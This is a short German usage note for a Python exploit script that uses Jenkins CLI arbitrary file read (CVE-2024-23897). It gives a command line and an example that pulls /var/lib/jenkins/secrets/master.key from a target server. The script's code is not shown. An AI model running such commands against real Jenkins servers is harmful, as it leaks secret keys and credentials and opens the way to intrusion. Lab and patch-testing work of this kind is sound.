
Jenkins CLI beliebiges Lesen (CVE-2024-23897 gilt für Versionen unter 2.442 und LTS 2.426.3)
Liest die ersten 3 Zeilen jeder Datei mit Leserechten für den aktuellen Benutzer auf dem System. Das Skript verwendet intern proxychains.
Verwendung:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
Beispiel:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key